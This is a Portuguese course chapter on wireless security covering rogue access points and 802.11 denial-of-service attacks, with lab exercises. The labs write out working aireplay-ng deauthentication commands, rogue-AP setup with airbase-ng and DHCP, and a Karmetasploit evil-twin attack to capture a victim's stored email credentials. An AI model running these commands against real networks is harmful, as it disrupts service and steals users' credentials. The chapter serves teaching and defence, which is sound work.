22 Identificar APs autorizados. 22 Filtrar APs de redes autorizadas e vizinhas. 11 É importante fazer avaliações com frequência. Kismet é uma ferramenta muito útil na detecção de rogues. Com Kismet, é possível conduzir todas as etapas de um warwalking, com a possibilidade de filtrar redes não interessantes na análise, ou seja, redes autorizadas e vizinhas (de outra organização próxima).

88

Para determinar as redes permitidas ou vizinhas: AP de uma empresa próxima, por exemplo – é necessário saber os endereços (BSSID) dessas redes. Com esses dados em mãos, é possível configurar o servidor Kismet de forma que tais redes sejam omitidas da análise, isto é, apenas redes rogue possíveis são exibidas. O filtro pode ser configurado no arquivo kismet.conf, através da diretiva filter_tracker. Alguns exemplos de filtro: 11 Filtro por BSSID: ignora BSSIDs especificados do processamento: filter_tracker = BSSID(XX:XX:XX:XX:XX:XX,! XX:XX:XX:XX:XX:XX) 11 Filtro por origem: ignora determinados endereços MAC: filter_tracker = SRC(! XX:XX:XX:XX:XX:XX,! XX:XX:XX:XX:XX:XX) 11 Filtro por máscara: ignora endereços (origem, destino ou BSSID) por prefixo: filter_tracker = ANY(xx:xx:xx:00:00:00/FF:FF:FF:00:00:00) É bom lembrar, entretanto, que um atacante pode forjar um AP por completo, ou seja, construir um AP com SSID, BSSID e outras configurações idênticas às da rede autêntica. Nesse caso, o auditor deve identificar também a origem do sinal para se certificar de que apenas o AP autêntico está divulgando a rede da empresa.

Monitoração da rede por clientes
11 Aproveita tempo ocioso da interface de rede. 11 Indicada quando há a possibilidade de conexão por cabo. 11 Duas maneiras: 22 RFMON. 22 Enquanto associado. 11 Limitações: 22 RFMON. 33 Não é possível se associar a uma rede nesse modo. 22 Associado. 22 Não é possível identificar rogues que escondem SSID.

q

Usar os próprios clientes da rede para monitoração é uma boa alternativa para os hardwares dedicados. Existem alternativas comerciais para essa tarefa – AirWave RAPIDS, por exemplo –, mas nosso foco é em ferramentas gratuitas. O modo de operação RFMON é melhor suportado em Linux, existindo diversas ferramentas à disposição, dependendo do tipo de informação que se quer monitorar. Sob Linux, é possível implantar uma infraestrutura de sensores Kismet que reportam para um servidor central através da rede cabeada – lembre-se de que não é possível se associar a uma rede enquanto a interface estiver em modo RFMON. Estudaremos mais adiante essa alternativa de monitoração usando drones Kismet. Em Windows também há opções interessantes de monitoração. Uma delas é usar a interface de gerenciamento que o Windows oferece, chamada de Windows Management Interface (WMI).
Capítulo 5 - Redes rogue e ataques DoS

89

Através de utilitários como CScript (Windows scripting host), Scriptomatic, WMI Code Creator e WMI Administrative Tools, é possível criar scripts VBS que consultam certos parâmetros do Sistema Operacional. O “namespace” que nos interessa é o root\WMI, e as classes que nos interessam possuem o padrão MSNdis_80211_. É bom lembrar que nem todas as interfaces de rede possuem drivers que permitem que todas as classes MSNdis_80211_* sejam usadas.

Rede sem fio: IDS na WLAN
11 Intrusion Detection System. 11 Monitoração constante. 22 Clientes ociosos. 22 Dispositivos dedicados. 11 Lista de redes autorizadas e vizinhas. 11 Implantação deve abranger toda a infraestrutura da organização. 11 IDS Distribuído. 22 Solução open source: 33 Drones Kismet com servidor central.

q

Implantar uma rede sem fio segura significa utilizar mecanismos de segurança, possuir uma política, monitorar a rede e auditá-la contra a política vigente. Monitoração é um elemento muito importante, mas muitas empresas simplesmente o ignoram. Kismet é uma ferramenta open source (código aberto) que não deve nada a ferramentas comerciais. É mais conhecido como ferramenta de auditoria e mapeamento de redes sem fio, mas sua funcionalidade de IDS de camada MAC é boa o suficiente para que se implante monitoração da rede. Kismet é composto de três componentes: 11 Kismet Client: interface gráfica de visualização dos dados coletados pelo Kismet Server. Assim como em ferramentas como Nessus, normalmente conecta-se com um servidor no próprio host. Sua configuração se resume basicamente a selecionar as informações que serão exibidas e o endereço do servidor Kismet; 11 Kismet Server : servidor de coleta. É nesse componente da arquitetura Kismet que se configura as fontes de dados (local ou drone), padrões de troca de canais, quais canais monitorar, entre outros parâmetros; 11 Kismet Drones: arquitetura opcional do Kismet, em que um drone captura dados da
Segurança em Redes sem Fio

Open source Também conhecido por software livre, respeita as quatro liberdades definidas pela Free Software Foundation, compartilhadas também pelo projeto Debian.

l
Conheceremos na atividade prática mais detalhes sobre essa funcionalidade do Kismet, mais especifica mente sobre a implantação de drones Kismet.

rede sem fio e encaminha para o servidor Kismet através de uma conexão secundária (normalmente, a rede sem fio). Exige pouco hardware e permite que se instalem drones diferentes para canais diferentes – a situação ideal é um drone em cada canal em tempo integral – e até padrões diferentes, como IEEE 802.11a, por exemplo.

90

Intrusion Prevention System (IPS)
11 Rogues identificados pelo Kismet. 11 Cliente tenta se conectar ao AP rogue. 11 IPS DoS contra os clientes da rede rogue. Riscos: 11 Falso-positivos. 11 Desconectar clientes de redes vizinhas. É possível atacar o problema dos rogues de uma maneira mais ativa com a implantação de um Intrusion Prevention System (IPS). Difere de um IDS porque, em vez de se limitar a

q

registrar intrusões, reage a elas. Uma sugestão de reação é efetuar um ataque de Denial of Service (DoS) contra os clientes que associam ao AP rogue. Quando o IPS da rede sem fio detecta a tentativa de um cliente se associar a um AP rogue, ele transmitirá quadros de desautenticação 802.11 forjados para a estação. Dessa forma, a estação considera os quadros provenientes do AP rogue e a conexão é terminada imediatamente. Pacotes de desautenticação são pacotes 802.11 de gerenciamento (tipo 00) e subtipo 1100. São anúncios que indicam que o receptor não está mais autenticado. É uma comunicação de uma via que, normalmente, parte de um Access Point (BSS) e deve ser aceito pela estação, com efeito imediato. A condição de negação de serviço se atinge quando se transmite constantemente esse tipo de quadro 802.11 a cada tentativa de autenticação da estação. Existem soluções comerciais de IPS disponíveis, mas é possível implantar um IPS básico associando a saída do Kismet com mdk3 – respectivamente, ferramentas de monitoração/ IDS e ataque DoS por desautenticação. Teremos a oportunidade de experimentar tanto com IDS distribuído usando Kismet quanto com ataques DoS.

Localizando rogues por análise de SNR
Signal to Noise Ratio (SNR): 11 Sem unidade, potência em dBm. 11 Análise manual. 11 Localiza a propagação do sinal e não o dispositivo. 11 Melhor SNR obtido enquanto associado.

q

Capítulo 5 - Redes rogue e ataques DoS

91

Força (dBm)

RSSI (Intensidade do sinal) Relação sinal-ruído

Nível de ruído 119129
Figura 5.2 Relação Sinal x Ruído.

Tempo (segundos)

Signal to Noise Ratio (SNR) ou Relação Sinal x Ruído, algumas vezes referenciado como S/N, é um valor usado para a razão entre a potência de um sinal e o ruído de fundo. Quanto maior o valor de SNR, menor é o número de erros e mais próximo se está do transmissor. É possível estimar a localização de rogues com base nesse indicador e no endereço MAC do dispositivo. O melhor SNR é obtido quando se está associado à rede, mas isso nem sempre é possível para um auditor. Por isso, é necessário o uso de interfaces de rede em modo Monitor asso ciado a ferramentas como Kismet para a leitura das medições de SNR. É importante lembrar que o valor de SNR tem mais relação com o padrão de propagação do sinal do que com o dispositivo transmissor em si. Isso quer dizer que é possível captar, a metros do AP rogue, um valor mais alto do que em cima dele.

Etapas da localização por SNR
11 Diagrama do prédio. 11 Amostragem de diversos pontos. 11 Processamento posterior para estimar a posição do transmissor. 11 Primeira fase da análise manual: consiste em obter diagramas do prédio que está sendo auditado. Isso é importante para que o auditor possa identificar, no diagrama, o sinal e o ruído em cada ponto; 11 Segunda fase: consiste em efetivamente coletar os valores de SNR em diversos pontos do local. É recomendado que se utilize uma antena omnidirecional (dipolo) para que o ganho e a abertura de captura da antena (beamwidth) não comprometam a medição,
Segurança em Redes sem Fio

q

que deve ser pontual. É recomendado também que o auditor realize um movimento de rotação lento sobre o ponto, coletando por pelo menos 30 segundos; 11 Terceira fase: é a de análise. Nela, o auditor analisa os valores de SNR e os confronta com o mapa, identificando os pontos com maior qualidade de sinal. Uma vez determi nada uma provável região em que o AP possa estar, o auditor pode passar a utilizar uma antena direcional.

92

Criando um AP rogue sob Linux
11 Objetivo: se passar por um AP existente. 11 Interface em modo Master: implementação mais simples:

q

# ifconfig wlan0 hwether XX:XX:XX:XX:XX:XX # ifconfig 192.168.1.1 netmask 255.255.255.255 # iwconfig wlan0 mode master # iwconfig wlan0 essid ROGUE # iwconfig wlan0 key off # iwconfig wlan0 rate auto
11 Airbase-ng: uma ferramenta do pacote aircrack-ng que permite criar um rogue AP com várias opções:

# airbase-ng --essid ROGUE –a XX:XX:XX:XX:XX:XX mon0
11 Servidor DNSmasq opcional: encaminhador de requisições DNS e DHCP para pequenas redes com NAT. 11 Servidor web ou Captive portal. É muito simples criar um Soft AP, um AP baseado em software. No exemplo do slide podemos ver, de maneira simplificada, o que é essencial para simplesmente se passar por um AP existente.

l
Para solução completa de Soft AP, normalmente se emprega um software chamado DNSmasq, um servidor que integra as funções de encaminhador de requisições DNS e servidor DHCP, ideal para pequenas redes que tenham NAT implementado.

Primeiro troca-se o endereço MAC, IP e máscara de rede da interface sem fio, de forma que sejam os mesmos do AP que se deseja duplicar. Depois, ativamos o modo Master e definimos um SSID igual ao do AP original, o que já é suficiente para que estações próximas vejam a interface como rede sem fio. Em seguida, configura-se parâmetros típicos de hotspots, como a ausência de mecanismos de segurança (WEP e WPA, para falar dos mais básicos) e, final mente, a taxa de transmissão. Os passos anteriores já são suficientes para que as estações se conectem ao seu AP clone, embora ainda não sejam possíveis consultas DNS ou roteamento para a internet. Uma vez que a intenção é apenas de capturar tráfego dos clientes, bastaria um servidor DHCP devi damente configurado para configurar automaticamente nas estações endereços IP, servi dores DNS e gateway.

Exercício de fixação 1 e Redes rogue
Explique as técnicas de análise de redes rogue.
Capítulo 5 - Redes rogue e ataques DoS

93

Denial of Service (DoS)
11 Negação de Serviço. 11 Ameaça frequentemente ignorada. 11 Não requer equipamento especial ou atacante avançado. 22 Notebooks comuns. 22 Interfaces de rede comuns. 22 Softwares disponíveis na internet. 11 A especificação 802.11i não oferece proteção.

q

Ataques DoS normalmente são desprezados por quem projeta uma rede sem fio, especial mente pela concepção errada de que são ataques complexos, que exigem equipamentos caros e um atacante altamente capacitado. É possível iniciar um ataque DoS com equipamentos comuns encontrados em lojas e softwares simples, baseados em Windows e Linux. Para transmitir, um atacante não precisa nem mesmo estar próximo à rede-alvo: o uso de antenas de alto ganho permite que se ataque a rede a grandes distâncias. A seguir, veremos alguns ataques que podem ser feitos contra organizações que tenham redes sem fio implantadas.

Tipos de ataque DoS contra redes 802.11
Persistentes: 11 Causam impacto, mesmo depois que o ataque cessa. 11 Mais eficiente para o atacante, exige menos recursos. 11 Pode exigir reboot. Não persistentes: 11 Perdem sua eficácia quando o ataque cessa ou o atacante fica fora de alcance. 11 Mais comum. Ataques DoS podem ser divididos em dois tipos:

q

11 Persistentes: causam impacto no sistema atacado, mesmo depois que o ataque termina; 11 Não persistentes: o impacto na rede cessa após o ataque. Ataques persistentes e não persistentes podem ser empregados, dependendo do obje tivo do atacante. Para interromper a atividade de rede por pouco tempo – para evitar ser detectado, por exemplo –, um ataque não persistente é suficiente para esSe propósito. Já o ataque persistente pode abranger todos os Access Points e canais – o que é mais interes Segurança em Redes sem Fio

sante, se a intenção é interromper a atividade de rede por completo e por mais tempo.

Ataque contra a camada física
Ataques na camada 1. 11 Ruído nas frequências de Wi-Fi. 11 Maior potência, mais canais. 11 Um ou mais canais. Exploração de vulnerabilidades nas especificações da camada MAC 802.11.

q

94

Ataques contra a camada física visam explorar vulnerabilidades, tanto do meio quanto de especificações de protocolo. O meio de radiofrequência utilizado por redes sem fio inclui as faixas de 2.4 GHZ ou 5 GHZ. Esse é o alvo do atacante que deseja atacar o meio. Redes sem fio, como redes cabeadas, dependem de um meio compartilhado que, mesmo sem atacantes, já é sujeito a DoS – um usuário que use demais o meio ou outras redes com a mesma frequência. Os ataques mais comuns não envolvem inserção de ruído na rede através de equipamentos específicos, opção muitas vezes cara. É mais comum explorar vulnerabilidades nas próprias especificações da camada MAC de IEEE 802.11 e nos clientes. Vamos nos limitar a explorar esses últimos ataques, que usam equipamentos-padrão de rede sem fio e exigem softwares simples.

Ataques à camada MAC 802.11
Especificação 802.11. 11 Diversas vulnerabilidades DoS. 11 Se fossem corrigidas, o padrão seria quebrado. Não há autenticação por pacote para os quadros. 11 Falha crítica. 11 Possibilidade de transmitir quadros de qualquer MAC de origem. 11 Pacotes de gerenciamento são transmitidos em claro. Como se defender de DoS se a própria especificação de 802.11 permite ataques? Dentre as vulnerabilidades, a que se destaca é a completa falta de um mecanismo de autenticação por pacote. Sem esse mecanismo, um atacante pode forjar o endereço MAC de origem dos pacotes, enviando qualquer tipo de quadro na rede sem fio. A estação que recebe esses quadros forjados não tem como detectar que eles não foram enviados pelo endereço MAC do pacote. Resultado: os pacotes são processados como se fossem autên -

q

ticos. O que impede a extinção desse tipo de vulnerabilidade é que alterar o comportamento do protocolo o quebraria, causando no mínimo incompatibilidade entre equipamentos. Quadros de gerenciamento são especialmente interessantes para se efetuar um ataque DoS contra estações de uma rede sem fio. A seguir, veremos alguns ataques que exploram tipos específicos de quadros de gerenciamento.

Ataque persistente: flood de autenticação ou associação
Autenticação ou associação repetida de origens forjadas. 11 São possíveis 2007 AID (Association Identifier) por AP 802.11. 11 Esgotamento de recursos do AP. Reações diversas, dependendo do AP. 11 Sempre com alguma forma de DoS. Uma das principais ferramentas. 11 Aireplay-ng (pacote Aircrack-NG). Introduzimos a questão de ataques DoS contra a camada MAC por autenticação ou asso ciação. O ataque ocorre pelo esgotamento de recursos do Access Point: o atacante envia

q
Capítulo 5 - Redes rogue e ataques DoS

quadros de gerenciamento dos subtipos autenticação e associação com origem forjada, na tentativa de esgotar a memória e o processamento do Access Point. Lembre-se de que uma

95

interface pode se associar a apenas um BSS, o que nesse caso não acontece – a interface de rede do atacante não conclui nenhuma associação porque o endereço de origem foi forjado. A especificação IEEE 802.11 determina que o número máximo de Association Identifiers (AID) que podem ser alocados é de 2007, por razões de economia de energia, mas não determina o que deve ser feito quando esse limite é atingido. Os Access Points têm diversas reações a esse ataque, todas com alguma forma de DoS: 11 Reboot; 11 Desassociação de clientes previamente associados; 11 Rejeição de novas associações, enquanto as ativas não terminam ou atingem timeout ; 11 “Congelamento” do AP. O único limitador desse ataque é que, em redes com autenticação por chave compartilhada (WEP), o atacante deve primeiro se autenticar – o que implica obter a chave WEP de alguma forma. Veremos adiante como comprometer chaves WEP.

[root@localhost console]# voidll_penetration /* voidll – 802.11b penetration testing utility * version 0.2.0 send comments to HYPERLINK

“mailto:reyk@vantronix.net” reyk@vantronix.net * * general options: * -t val type (default: 1)

* 0: no action * 1: deauth stations * 2: auth flood * 3: assoc flood * -d n * -s MAC * -S str delay (default: 10000 usecs)

station (default: ff:ff:ff:ff:ff:ff / Randon) ssid (default: ‘ ‘)

* -h * -D
Segurança em Redes sem Fio

show this help debug (-DD... for more bssids)

* * single target dos: * -B MAC * * auto target dos: * -m n max concurrent floods (default: 23 floods) dssid (default: scan for bssids)

96

* -T n * -l file

timeout (default: 10sec)

matchlist match policy (white: 0, black:1 default: 0)

* -p n */

Figura 5.3 Interface gráfica do gVoid11.

Void11 é uma implementação do ataque de associação ou autenticação para Linux que usa o driver HostAP. Usa endereços MAC aleatórios para atacar APs especificados na execução do programa ou qualquer um que seja detectado. A ferramenta implementa outros tipos de ataque – desautenticação, por exemplo, que veremos a seguir. Em uma versão mais recente, inclui uma interface gráfica, o que facilita o
Script kiddie Termo depreciativo atribuído aos grupos de crackers inexperientes (geralmente muito jovens) que desenvolvem atividades relacionadas com segurança da informação utilizando-se do trabalho intelectual dos verdadeiros especialistas técnicos.

trabalho dos script kiddies.

Ataque não persistente: flood de desautenticação
11 Atacante forja o MAC do AP. 11 Quadros de desautenticação enviados para os clientes. 11 Pode ter como alvo um usuário ou todos.

q
Capítulo 5 - Redes rogue e ataques DoS

11 Drivers mais novos não reagem a quadros 802.11. O ataque de desassociação ou desautenticação interrompe a comunicação com o AP, tirando proveito dos quadros criados para liberar carga do AP quando há muitos clientes associados. A reação do driver do cliente pode ser a de buscar o mesmo SSID em outros canais, tentar uma nova conexão com o AP ou ignorar por completo os quadros. Diferente de ataques de camada física, que atacam toda a atividade de redes sem fio em determinados canais, esse tipo de ataque é mais específico. Pode ser direcionado a um cliente específico ou mesmo a todos os clientes de um AP, ao enviar o quadro para o ende reço de broadcast (FF:FF:FF:FF:FF:FF).

97

Ataque não persistente: autenticação inválida
11 Atacante envia requisição de autenticação inválida para AP com MAC de origem (vítima) forjado. 11 AP responde para o IP de origem (vítima) com “unknown or unsupported algorithm”. 11 Usuário previamente autenticado é desautenticado. 11 Não persistente. 11 Clientes normalmente reautenticam. Nesse ataque DoS divulgado na lista BUGTRAQ, um pacote forjado de autenticação é enviado com um algoritmo inválido, que aparenta ter partido do cliente que se pretende

q

w
Mais informações em “BugTraq: 802.11b DoS exploit”: http://www. securityfocus.com e em Mark “Fat Bloke” Osborne: http://www. loud-fat-bloke.co.uk/

atacar. Uma vez que o Access Point já estava autenticado, os APs normalmente respondem com um quadro de gerenciamento “unknown or unsupported algorithm” e interrompem a conexão em andamento. De acordo com seu autor, um pacote a cada 2.5 segundos é o suficiente para se ter sucesso e manter um ataque DoS constante.

Ataque não persistente: reserva do meio
Atacante forja múltiplos pacotes RTS: 11 Request to Send. 11 Quadro de controle tipo 01 e subtipo 1011. NAV definido como máximo: 32.767 microssegundos. 11 Network Allocation Vector. 11 1 segundo ~ 31 pacotes. Os nós perdem acesso à rede pelo período determinado no NAV. Outro problema de reserva de meio é o nó oculto. O mecanismo de gerenciamento do meio Request to Send/Clear To Send (RTS/CTS) usa quadros de controle para “limpar” o meio antes de transmitir. Apenas um cliente da rede

q

pode transmitir por vez, para que não crie colisões – o que caracteriza a natureza half-duplex do algoritmo Carrier-Sense Multiple Access with Collision Avoidance (CSMA/CA). É possível atacar esse mecanismo forjando pacotes RTS com o Network Allocation Vector (NAV) definido com seu valor máximo – 32.767 microssegundos. Assim, o envio de pelo menos 31 desses pacotes por segundo é o suficiente para impedir que outros nós tenham acesso à rede por 1 segundo. Aplicado de maneira constante, coloca a rede em condição de negação de serviço (DoS). O cliente da rede “escuta” o meio antes de transmitir. Uma vez transmitido, o cliente recebe
Segurança em Redes sem Fio

um quadro de reconhecimento (ACK, tipo 01 e subtipo 1101) apenas para quadros de dados enviados – quadros de gerenciamento não recebem ACK. Essa característica faz com que as redes sofram do problema do nó oculto, representado na próxima ilustração.

98

Ataque não persistente: problemas de CSMA/CA

Nó A

Nó B

Nó C

Figura 5.4 Problema do nó oculto.

Considere um caso em que o nó A está transmitindo para o nó B. O nó C não está ciente disso e também tenta transmitir para B, produzindo colisão. Uma rede com vários desses nós ocultos pode sofrer de baixas taxas de transmissão e desempenho. O gerenciamento de meio RTS/CTS resolve esse problema. Veja como o problema do “nó oculto” é resolvido pelo mecanismo RTS/CTS: 11 A estação A transmite um quadro RTS informando um Network Allocation Vector (NAV), que é o tempo reservado para a sua transmissão; 11 A estação B recebe o quadro RTS e responde para toda a área de abrangência de B com um quadro Clear To Send (CTS). A estação que não enviou um quadro RTS interpreta isso como um sinal para aguardar antes de transmitir. A estação que transmitiu o quadro RTS – estação A, nesse caso – interpreta como sinal verde para a transmissão do quadro; 11 Estação A transmite o quadro.

DoS e IEEE 802.11
11 IEEE está ciente das falhas e ataques. 11 802.11i é tão vulnerável a DoS quanto 802.11 de 1997. 11 Solução: 802.11w.

q
Capítulo 5 - Redes rogue e ataques DoS

22 Proteção para quadros de gerenciamento. 11 Meio sempre será vulnerável. A proteção dos quadros de gerenciamento está sendo tratada pelo grupo de trabalho TGw (Project IEEE 802.11 Task Group w – Protected Management Frames). O IEEE está ciente das falhas de 802.11 e dos ataques aos quadros de gerenciamento, mas esse grupo de trabalho não tem como objetivo acabar com a ameaça do DoS. O resultado desse grupo de trabalho será um padrão 802.11w capaz de eliminar diversas vulnerabilidades do protocolo de gerenciamento de 802.11. Vale lembrar que o meio sempre será vulnerável a interferências de outras redes, fornos de micro-ondas, telefones sem fio e/ou mesmo RF-jamming, que consiste em poluir propositalmente a faixa de frequência das ondas de rádio.

99

Medidas de defesa
11 Pouco pode ser feito. 11 Barreiras contra a propagação de sinais de radiofrequência. 11 Identificar ataques em andamento com IDS. 11 Plano de resposta. Pouco pode ser feito para a contenção de ataques de DoS. A única maneira de impedir os ataques que abordamos é difícil de ser implantada: limitar a capacidade do atacante de transmitir para os dispositivos da sua rede sem fio. Um sistema de IDS pode ser útil para

q

identificar ataques em andamento, o que pode eliminar outras possibilidades de indisponi bilidade na rede sem fio. Identificar ataques também pode auxiliar na resposta a ataques, fazendo com que os administradores da rede tomem medidas cabíveis, como por exemplo procurar o dispositivo usando técnicas de identificação de rogues. A melhor medida de defesa contra ataques DoS é ter um plano de resposta a esse tipo de ameaça, determinando o que a organização deverá fazer para minimizar o impacto em elementos críticos da rede.

100

Segurança em Redes sem Fio

Roteiro de Atividades 5
Atividade 5.1 – Identificando APs na rede cabeada
Nesta atividade, executaremos o Nmap, com um script Nmap Script Engine (NSE) específico para identificar Access Points que estão ligados na rede cabeada do laboratório. Esse script foi desenvolvido por Joshua Wright (instrutor do SANS Institute) e está disponível no diretório /root/Desktop/SEG6/rogueap.nse e no site http://www.willhackforsushi.com/code/rogueap.nse Copie o arquivo rogueap.nse para o diretório de scripts NSE do Nmap (/usr/local/share/nmap/scripts). Para realizar esse laboratório, será necessário que o AP esteja conectado à rede cabeada do laboratório.

# nmap -sS -O --open --script=rogueap.nse <Faixa de endereços IP>
Exemplo:

# nmap -sS -O --open --script=rogueap.nse 192.168.1.1-10 Starting Nmap 5.51 ( http://nmap.org ) at 2011-11-02 17:22 EDT Nmap scan report for 192.168.1.1 Host is up (0.0031s latency). Not shown: 996 filtered ports, 3 closed ports PORT STATE SERVICE 80/tcp open http |_rogueap: Possible Rogue AP Found: “Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 wireless broadband router” MAC Address: 00:18:39:C8:B5:48 (Cisco-Linksys) Device type: WAP|broadband router Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 wireless broadband router, Netgear WGT624 WAP, Netgear WGR614v7, WGT624v3, or WPN824v2 WAP (VxWorks 5.4.2) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 10 IP addresses (1 host up) scanned in 22.31 seconds
No exemplo anterior fizemos uma varredura na faixa de endereços IP iniciando por 192.168.1.1 até 192.168.1.10. Nessa varredura encontramos um Access Point com o IP 192.168.1.1, que provavelmente é um Linksys WRT54G ou WRT54G2 ou Netgear WGR614 ou WPN824v2 wireless broadband router.
Capítulo 5 - Roteiro de Atividades

101

É importante observar que essa abordagem é útil somente na análise a partir da rede cabeada. A ideia é saber se existe um AP oculto na rede, logo não faz sentido usar essa varredura a partir de um cliente associado ao AP. Além do Nessus e do Nmap, é possível realizar essa varredura através do software Paglo RogueScanner, disponível tanto para Windows como para Linux

Atividade 5.2 – Realizando um ataque de Negação de Serviço em 802.11
Nesta atividade executaremos um dos tipos de ataque de negação de serviço que explora a desassociação de clientes 802.11 pelo envio de quadros de gerenciamento com conteúdo e origem forjados.

Lembre-se de usar esse tipo de comando com responsabilidade e ética.

Nesse tipo de ataque, a condição de Negação de Serviço (Denial of Service – DoS) é criada quando um cliente é impedido de se manter associado a um AP. Também é possível realizar um ataque ainda mais abrangente, que afeta qualquer cliente de um dado AP. Esse tipo de ataque explora vulnerabilidades dos próprios protocolos 802.11, que não foram desenvolvidos sem prever o envio de quadros forjados, que simulam ordens do AP para clientes que chegam na forma de quadros 802.11 do tipo “deauthentication” e “disassociation”. Há um grupo de trabalho IEEE trabalhando na proteção de quadros de gerenciamento, 802.11w (Protected Management Frames). O ataque que iremos realizar não será mais possível depois que esse novo padrão for ratificado e se tornar disseminado entre os equipamentos. Alguns outros ataques de DoS, além do próprio jamming físico, ainda serão possíveis. Antes de qualquer comando, você deve verificar se sua interface de rede 802.11 e respectivo driver permitem a injeção de pacotes, essencial na criação de quadros que se passam por tráfego proveniente do AP. Para verificar isso, use os comandos airmon-ng, airodump-ng e aireplay-ng, parte do pacote de ferramentas Aircrack-ng.

# # airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2573 US rt73usb - [phy0]

(monitor mode enabled on mon0) # aireplay-ng mon0 --test
Tanto a interface de rede que estamos usando quando o módulo (driver) rt73 foram tes Segurança em Redes sem Fio

tados previamente. Uma saída bem-sucedida do comando é:

12:11:37 Trying broadcast probe requests... 12:11:38 Injection is working! 12:11:38 Found 1 AP 12:11:38 Trying directed probe requests...

102

12:11:38 00:02:6F:xx:xx:xx - channel: 1 - ‘rnpesr’ 12:11:43 Ping (min/avg/max): 8.811ms/46.750ms/199.119ms Power: 37.25 12:11:43 12/30: 40%
Se o comando anterior foi bem-sucedido, então podemos prosseguir. Algumas vezes é necessário descarregar o módulo rt73 e carregá-lo novamente. Agora busque redes e clientes próximos usando a ferramenta Airodump-ng. Também podemos utilizar Kismet.

# airodump-ng mon0
Uma saída comum do comando é:

CH 2 ][ Elapsed: 4 s ][ 2008-10-03 12:21

BSSID

PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

02:18:DE:xx:xx:xx -1 3

0 0 11 54. OPN

Internet Oasis(FREE) rnpesr

00:02:6F:xx:xx:xx 47 8 12 0 1 11 WEP WEP

BSSID

STATION

PWR Rate Lost Packets Probes

00:02:6f:xx:xx:xx 00:18:DE:xx:xx:xx 3 0- 1 0 00:03:6f:xx:xx:xx 00:02:2D:xx:xx:xx 41 0- 2 8

3 7

Lembre-se de o airodump-ng percorre todos os canais se não for especificado um canal. Observe que no painel superior são exibidos os Access Points. Neste painel você vai coletar dois dados importantes: o SSID e o BSSID do Access Point que será atacado. Observe no painel inferior as associações entre clientes e APs. A última coluna desse painel (probes) exibe os probes que esse cliente está realizando, as redes que estão sendo buscadas. Um comportamento comum de clientes Windows é buscar por redes já conhecidas; esse campo normalmente é preenchido por vários SSIDs, inclusive de redes que não existem na área. Forme par com um colega ao lado. Você realizará o ataque e ele será atacado. Você precisa saber o endereço MAC do cliente. Para isso, oriente seu colega a executar o seguinte comando:
Capítulo 5 - Roteiro de Atividades

# ifconfig wlan0
Anote: BSSID do AP: SSID do AP:

103

Endereço MAC cliente: Acompanhe o cliente de seu colega se associando e trocando tráfego com o AP pelo Airodump-ng. Para desassociar o cliente de seu colega:

# aireplay-ng mon0 --deauth 1 -a aa:aa:aa:aa:aa:aa -h aa:aa:aa:aa:aa:aa: -c bb:bb:bb:bb:bb:bb
Onde: -a (BSSID – endereço MAC do AP: caracteres hexadecimais 0-9 a-f) -h (endereço MAC origem dos pacotes; caracteres hexadecimais 0-9 a-f) -c (endereço MAC do cliente; caracteres hexadecimais 0-9 a-f) Lembre-se de que o endereço do cliente de seu colega será usado no parâmetro “-c”. Essa saída indica que você provavelmente cometeu um erro ao digitar o BSSID do AP:

The interface MAC (06:15:AF:xx:xx:xx) doesn’t match the specified MAC (-h). ifconfig ath1 hw ether 00:1C:10:xx:xx:xx 12:44:58 Waiting for beacon frame (BSSID: 00:1C:10:xx:xx:xx) 12:44:58 No such BSSID available. Please specify an ESSID (-e).

Atividade 5.3 – Exercício opcional
1. Inclua um segundo colega em seu experimento. Peça que ele capture (airmon-ng, airodump-ng, modo Monitor) na estação o tráfego que você gerou. Analise o tráfego em grupo com Wireshark e anote: Tipo de quadro (frame) 802.11: Quantos quadros foram gerados em seu ataque: 2. Você pode também realizar um ataque que causa a desassociação de todos os clientes de um AP. Você pode fazer isto ordenando que o destino dos quadros seja broadcast.

# aireplay-ng mon0 --deauth 0 -a 00:1C:10:xx:xx:xx

Atividade 5.4 – Um ataque rogue completo
Essa atividade demonstrará como um rogue AP pode afetar a confidencialidade em uma rede sem fio. Para esse laboratório utilizaremos duas estações, uma vítima utilizando o
Segurança em Redes sem Fio

Sistema Operacional Windows XP e um atacante utilizando o Backtrack. Configurando o cenário: 1. Computador vítima: a. Configurar a rede sem fio do Windows para acessar a rede do laboratório (SSID: ESR-SEG6).

104

b. Assim que o Windows se associar ao AP e pegar um IP, desligue o AP. c. O Windows mantém uma lista de Access Points que ele já se conectou e fica fazendo probes na rede em busca desses Access Points. Assim, suponhamos que você se conecte na rede do trabalho e se desconecte e vá a um local público. Se um usuário mal-intencionado realizar um scan nesse local, ele conseguirá visualizar os probes que seu Sistema Operacional está realizando, e poderá assim criar um AP rogue para fazer com seu Sistema Operacional se conecte automaticamente a essa rede falsa. d. Configurar o Outlook Express para se conectar a um servidor de e-mail fictício com um usuário e senha salvo. 2 . Computador atacante: a. Configurar a interface em modo monitor:

# airmon-ng start wlan0
b. Iniciar o airbase-ng simulando o SSID da rede do laboratório (ESR-SEG6):

# airbase-ng –e ‘ESR-SEG6’-c 3 -v mon0
11 -e – especifica o SSID da rede rogue. 11 -c – especifica o canal da rede rogue. 11 -v – habilita modo verbose. 11 mon0 – interface em modo raw que será utilizada para criar a rede rogue. c. Crie o arquivo /etc/dhcp3/dhcpd.conf com os dados a seguir para criar um servidor DHCP para a rede rogue (arquivo dhcpd.conf disponível em /root/Desktop/SEG6 ):

option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254 option routers 10.0.0.1 option domain-name-servers 10.0.0.1 }
d. Configurar o IP da interface criada pelo airbase-ng (at0):
Capítulo 5 - Roteiro de Atividades

# ifconfig at0 10.0.0.1 netmask 255.255.255.0
e. Iniciar o servidor DHCP:

# /etc/init.d/dhcp3-server start

105

f. Iniciar o metasploit com o script karmetasploit (uma implementação da famosa ferramenta de rogue Karma, para o framework metasploit). O script karma.rc está em /root/Desktop/SEG6:

# cd /pentest/exploits/framework3 # cp /root/Desktop/SEG6/karma.rc . # ./msfconsole –r karma.rc
